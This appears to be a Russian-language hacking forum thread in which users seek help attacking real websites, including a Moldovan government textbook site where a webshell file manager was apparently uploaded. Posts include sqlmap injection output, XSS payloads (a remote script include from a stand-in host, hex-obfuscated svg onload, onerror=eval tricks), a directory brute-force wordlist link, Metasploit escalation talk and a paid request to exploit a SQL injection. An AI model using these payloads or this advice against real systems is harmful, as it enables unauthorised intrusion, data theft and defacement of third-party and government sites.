Привет, помогите узнать где залился файл filemanager.php7 из раздела "Clasa a I-a" http://ctice.gov.md/manuale-scolare/ http://ctice.md/public/download.php?id=249
[01:38:29] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5 (MariaDB fork) [01:38:29] [INFO] fetching database names [01:38:29] [INFO] fetching number of databases [01:38:30] [INFO] resumed: ЩЩ [01:38:30] [ERROR] unable to retrieve the number of databases [01:38:30] [INFO] falling back to current database [01:38:30] [INFO] fetching current database [01:38:30] [WARNING] cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files [01:38:30] [INFO] resumed: `к? available databases [1]: [*] `к? Как с этим бороться?
пробуй alert`aaa` вот тебе пример https://forum.antichat.ru/threads/424991/page-17 но если отработает такая штука, то алерт не нужен <script src=//lala.com/lala.js>
Code: document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//
Code: onerror=eval;throw'=alert\x281\x29' Больше нравится (с предварительной записью в window.name, который передается в рамках одного окна) Code: onerror=eval;throw window.name
миллиона тебе достаточно? много не всегда есть хорошо Code: https://github.com/foospidy/payloads/blob/master/owasp/dirbuster/directory-list-2.3-big.txt
Это да,но всё же касательно сайта.Я чекнул там вроде ftp порт открыт и мне интересно как это раскрутить(через msf выдаёт ошибку ,что иньекция выполнена,но сесси нет)
Какой модуль msf вы используете? Сам сайт крyтится на moodle, а FTP порт скорее всего открыт хостером.
Всем привет,помогите пожалуйста ситуация такая: Appspider(Rapid7) находит sql уязвимость "Double-float overflow" отправляя значение "1e309" как данные POST запросом,в ответе Mysql2::Error: Unknown column 'Infinity' in 'field list': INSERT INTO `interactions` (`accept_langs`, `browser`, `browser_version`....перечисление всех колонок) при ЛЮБЫХ других значениях кроме "1e309(и выше 1e310..)" ошибки НЕТ,sqlmap не может раскрутить ее,пробовал фазерам через owasp большим списком также ошибок других не нашлось реакция только на 1e309. И из всего этого вопрос как ее раскрутить в sqlmap?готов оплатить за помощь если кто знает как решить,моя телега @S920799